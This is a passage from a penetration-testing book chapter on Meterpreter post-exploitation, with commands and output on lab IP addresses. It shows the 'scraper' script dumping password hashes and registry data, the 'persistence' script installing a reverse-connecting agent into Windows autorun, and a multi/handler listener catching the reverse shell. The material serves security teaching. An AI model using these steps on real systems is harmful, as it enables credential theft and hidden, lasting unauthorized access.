background image

94

Chapter 6

meterpreter > 

run scraper

[*] New session on 192.168.33.130:1095...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\WINDOWS\TEMP\XklepHOU.reg)

Using Persistence

Meterpreter’s 

persistence

 script allows you to inject a Meterpreter agent to 

ensure that Meterpreter is running even after the target system reboots. If 
this is a reverse connection, you can set intervals for the target to connect 
back to the attacker machine. If it’s a bind, you can have it attempt to bind 
on an interface at a given time.

WARNING 

If you use this functionality, be sure that you remove it after you’re done. If you forget to 
do this, any attacker can also gain access to the system without authentication!

In the following listing, we run 

persistence

 and tell Windows to autostart 

the agent at boot time (

-X

), wait 50 seconds (

-i 50

) before connection retries, 

run on port 443 (

-p 443

), and connect to IP 192.168.33.129. We then estab-

lish a listener for the agent at   with 

use multi/handler

, and after setting a 

couple of options and running 

exploit

, we see at   that the connection comes 

in as expected.

meterpreter > 

run persistence -X -i 50 -p 443 -r 192.168.33.129

[*] Creating a persistent agent: LHOST=192.168.33.129 LPORT=443 (interval=50 onboot=true)
[*] Persistent agent script is 316384 bytes long
[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\asSnqrlUDRwO.vbs
[*] Agent executed with PID 3160
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\xEYnaHedooc
[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\

xEYnaHedooc

msf> 

use multi/handler

 

msf exploit(handler) > 

set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > 

set LPORT 443

LPORT => 443
msf exploit(handler) > 

set LHOST 192.168.33.129

LHOST => 192.168.33.129
msf exploit(handler) > 

exploit

[*] Started reverse handler on 192.168.33.129:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 2 opened (192.168.33.129:443 -> 192.168.33.130:1120)